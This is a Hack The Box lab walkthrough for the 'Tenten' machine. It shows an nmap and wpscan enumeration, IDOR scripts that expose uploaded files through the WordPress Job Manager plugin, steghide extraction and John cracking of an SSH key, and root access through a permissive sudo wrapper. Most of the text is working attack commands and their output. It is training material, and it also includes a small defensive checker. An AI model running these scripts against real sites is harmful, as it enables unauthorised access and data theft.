2020-03-18

HTB::Tenten Walkthrough

0x01 Information

0x02 Tools and Tips

  • nmap
  • wpscan
  • JohnTheRipper
  • steghide
  • wordpress job-manager plugin

0x03 Pentesting

Scan the target's ports with nmap:

```
Nmap scan report for 10.10.10.10
Host is up (0.23s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.2 - 4.9 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 4.9 (91%), Linux 3.12 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 237.00 ms 10.10.16.1
2 309.00 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 541.37 seconds
```

Port 80 is serving a WordPress site (4.7.3 according to the generator tag), so go straight to wpscan:

wpscan usage guide (Chinese): https://www.cnblogs.com/Xy--1/p/12236684.html

wpscan lists a lot of XSS issues for this version, but XSS is rarely of any use on a box like this, so keep reading: the site has the job-manager plugin installed.

Open the "apply for a job" page and there is a file upload. Upload a normal image first, then fetch it at http://10.10.10.10/wp-content/uploads/%year%/%month%/%filename% (the standard WordPress upload path) and it renders fine. Next, try changing the file content with Burp Suite:

The server checks the extension; so far only image types such as jpg and png can be uploaded.

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

That article describes a horizontal-authorization (IDOR) technique: in http://10.10.10.10/index.php/jobs/apply/8/ the 8 is the id of a job record, and nothing stops us from iterating over it with Burp Suite:

Alternatively, a bash one-liner gives a more direct view of the results:

```bash
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i | grep '<title>'; done
```

The record with id=13 has the title HackerAccessGranted, which looks suspicious, and the record with id=17 has the file name of the image I just uploaded as its title. Put together, this suggests HackerAccessGranted is also the file name of an image someone uploaded. To reach that image we need the year and month it was uploaded in, so write a small Python script to try them all:

```python
import requests

website = 'http://10.10.10.10/wp-content/uploads/'
filename = 'HackerAccessGranted'
exts = ['jpg', 'png', 'gif']

# WordPress stores uploads under uploads/YYYY/MM/, so try every
# year/month/extension combination and report the ones that exist.
for year in range(2016, 2018):
    for month in range(1, 13):
        for ext in exts:
            url = website + str(year) + '/' + "{:02}".format(month) + '/' + filename + '.' + ext
            req = requests.get(url, timeout=10)
            if req.status_code == 200:   # 404 (or 403) means it is not there
                print('[+] URL Found: ' + url)
```

Result: http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
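The two steps above (walking the job ids and guessing the upload path) can be chained into one script. The following is an added example, not code from the original post: the base URL, id range, year range and extension list are assumptions, and the fetcher is injectable so the logic runs offline against constructed sample responses (`SAMPLE_RESPONSES`, not real captures); pass `http_fetch` instead to run it against a real target.

```python
"""Added example: job-id IDOR on /index.php/jobs/apply/<id>/ followed by a
wp-content/uploads/YYYY/MM/<name>.<ext> path guess. Target, ranges and
extensions are assumptions; SAMPLE_RESPONSES is constructed test data."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Iterator, List, Optional, Tuple

Fetcher = Callable[[str], Tuple[int, str]]       # url -> (status code, body)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)
FILE_STEM_RE = re.compile(r"^[\w.-]+$")          # titles that could be a file name


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """GET with the standard library; HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:         # 403, 404, ...
        return err.code, ""
    except urllib.error.URLError:                 # DNS or connection failure
        return 0, ""


# Constructed sample responses standing in for the target (not real captures).
SAMPLE_RESPONSES: Dict[str, Tuple[int, str]] = {
    "/index.php/jobs/apply/8/": (200, "<html><head><title>Pen Tester</title></head></html>"),
    "/index.php/jobs/apply/13/": (200, "<html><head>\n<title> HackerAccessGranted </title>\n</head></html>"),
    "/wp-content/uploads/2017/04/HackerAccessGranted.jpg": (200, "\xff\xd8 jpeg bytes"),
    "/wp-content/uploads/2017/05/HackerAccessGranted.jpg": (403, ""),   # Forbidden is still a miss
}


def offline_fetch(url: str) -> Tuple[int, str]:
    """Fetcher that answers from SAMPLE_RESPONSES; anything else is a 404."""
    for suffix, response in SAMPLE_RESPONSES.items():
        if url.endswith(suffix):
            return response
    return 404, ""


def extract_title(html: str) -> Optional[str]:
    """Text of the first <title> element, or None."""
    match = TITLE_RE.search(html)
    return match.group(1).strip() if match else None


def enumerate_job_titles(base: str, ids: Iterable[int],
                         fetch: Fetcher = http_fetch) -> Dict[int, str]:
    """IDOR walk over the application pages. Job Manager titles the page after
    the record, so an applicant's CV shows up under its original file name
    (the CVE-2015-6668 disclosure). Ids that do not return 200 are skipped."""
    titles: Dict[int, str] = {}
    for job_id in ids:
        status, body = fetch(f"{base}/index.php/jobs/apply/{job_id}/")
        title = extract_title(body) if status == 200 else None
        if title:
            titles[job_id] = title
    return titles


def candidate_upload_urls(base: str, filename: str, years: Iterable[int],
                          exts: Iterable[str]) -> Iterator[str]:
    """Every wp-content/uploads/YYYY/MM/<filename>.<ext> the file could live at."""
    for year in years:
        for month in range(1, 13):
            for ext in exts:
                yield f"{base}/wp-content/uploads/{year}/{month:02d}/{filename}.{ext}"


def find_uploads(base: str, filename: str, fetch: Fetcher = http_fetch,
                 years: Iterable[int] = (2016, 2017),
                 exts: Iterable[str] = ("jpg", "png", "gif")) -> List[str]:
    """Only a 200 counts as a hit; a 403 or 404 from Apache means not there."""
    return [url for url in candidate_upload_urls(base, filename, years, exts)
            if fetch(url)[0] == 200]


def hunt(base: str, ids: Iterable[int], fetch: Fetcher = http_fetch) -> Dict[str, List[str]]:
    """Titles that look like file stems, mapped to the upload URLs that exist."""
    stems = {t for t in enumerate_job_titles(base, ids, fetch).values() if FILE_STEM_RE.match(t)}
    return {stem: find_uploads(base, stem, fetch) for stem in sorted(stems)}


if __name__ == "__main__":
    BASE = "http://10.10.10.10"                   # assumed target, as in the walkthrough
    for stem, urls in hunt(BASE, range(1, 21), offline_fetch).items():   # offline demo
        for url in urls:
            print(f"[+] URL Found: {url}")
```

Two details matter in practice: only a 200 is treated as a hit (the original script accepted any non-404, so a 403 from a directory listing ban would have been reported as a find), and only titles that look like a bare file name are used as candidates, which is what separates an uploaded CV from an ordinary job post.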

Check the image with binwalk:

```
$ binwalk HackerAccessGranted.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
```

binwalk sees nothing appended, so try the steganography tool steghide (an empty passphrase works here):

```
$ steghide extract -sf HackerAccessGranted.jpg 
Enter passphrase:
wrote extracted data to "id_rsa".
```

OK, that gives us an id_rsa file. It is passphrase-protected, so convert it with ssh2john and crack it with John:

```
$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash 
$ /sbin/john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:08 DONE (2020-03-18 10:52) 0.1173g/s 1683Kp/s 1683Kc/s 1683KC/sa6_123..*7¡Vamos!
Session completed
```

Good, we have the passphrase, but no username yet... so enumerate the site's users with wpscan:

```
[i] User(s) Identified:

[+] takis
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
```

SSH into the box as takis with the key and grab user.txt:

```
$ ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May 5 23:05:36 2017
takis@tenten:~$ whoami
takis
takis@tenten:~$ ls -la /home/takis
total 48
drwx------ 5 takis takis 4096 Apr 12 2017 .
drwxr-xr-x 5 root root 4096 Apr 12 2017 ..
-rw------- 1 root root 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 takis takis 220 Apr 12 2017 .bash_logout
-rw-r--r-- 1 takis takis 3771 Apr 12 2017 .bashrc
drwx------ 2 takis takis 4096 Apr 12 2017 .cache
-rw------- 1 root root 162 Apr 12 2017 .mysql_history
drwxrwxr-x 2 takis takis 4096 Apr 12 2017 .nano
-rw-r--r-- 1 takis takis 655 Apr 12 2017 .profile
drwx------ 2 takis takis 4096 Apr 12 2017 .ssh
-rw-r--r-- 1 takis takis 0 Apr 12 2017 .sudo_as_admin_successful
-r--r--r-- 1 takis takis 33 Apr 12 2017 user.txt
-rw-r--r-- 1 root root 217 Apr 12 2017 .wget-hsts
```

Privilege escalation is trivial. sudo -l shows takis may run anything as root (with a password), and /bin/fuckin is allowed with NOPASSWD; since that script just executes whatever arguments it is given, it is an unrestricted root command runner:

```
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ ls -la /bin/fuckin
-rwxr-xr-x 1 root root 24 Apr 12 2017 /bin/fuckin
takis@tenten:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
takis@tenten:~$ sudo /bin/fuckin cat /root/root.txt
f9f7[------------------]f603
```
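The wrapper above is the general pattern to look for when auditing sudoers: a NOPASSWD rule on a script that hands its positional parameters to the shell is the same as granting root outright, because the caller chooses the command. The following is an added example, not part of the walkthrough: a small static check that flags that pattern, run over two constructed scripts (the wrapper as found on the box, and a menu-style rewrite that never executes its argument).

```python
"""Added example: flag sudo wrapper scripts that turn their arguments into the
command. VULNERABLE mirrors /bin/fuckin from the box; SAFER is a constructed
rewrite in which the argument only selects a fixed action."""
import re
from typing import List, Pattern, Tuple

# Each rule means "caller-controlled text becomes the command that runs as root".
_RULES: List[Tuple[Pattern, str]] = [
    (re.compile(r'^\s*"?\$[1-9@*]"?(\s|$)', re.M),
     "positional parameter used as the command word"),
    (re.compile(r'\b(eval|exec|bash\s+-c|sh\s+-c)\b[^\n]*\$[1-9@*{]'),
     "eval/exec/sh -c applied to caller-controlled text"),
]


def audit_sudo_wrapper(script: str) -> List[str]:
    """Return one finding per matching rule; an empty list means nothing flagged."""
    return [finding for pattern, finding in _RULES if pattern.search(script)]


VULNERABLE = "#!/bin/bash\n$1 $2 $3 $4\n"      # the wrapper as found on the box

SAFER = """#!/bin/bash
# Fixed menu of actions: the argument selects, it is never executed.
set -euo pipefail
case "${1:-}" in
  status)  systemctl status apache2 ;;
  restart) systemctl restart apache2 ;;
  *) echo "usage: $0 status|restart" >&2; exit 1 ;;
esac
"""

if __name__ == "__main__":
    for name, script in (("VULNERABLE", VULNERABLE), ("SAFER", SAFER)):
        print(name, "->", audit_sudo_wrapper(script) or "no findings")
```

The check is deliberately narrow: it catches an argument used as the command word and the eval/exec/`sh -c` family, which covers wrappers like this one and the common `exec "$@"` variant, but a review still has to read the script, since a wrapper that only runs a fixed binary can still be dangerous if that binary has its own shell escape.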

0x04 Summary

Tenten is a fairly old Linux box and is mainly worth doing to broaden your horizons. Its style is close to a CTF challenge: find the vulnerable WordPress plugin, use the standard WordPress upload path to locate an image with an id_rsa file hidden in it by steganography, and then do a very simple privilege escalation, for which there are several routes. All in all an easy box; a small script to brute-force the directory, done in a day, more tomorrow.

Copyright © ca01h 2019-2020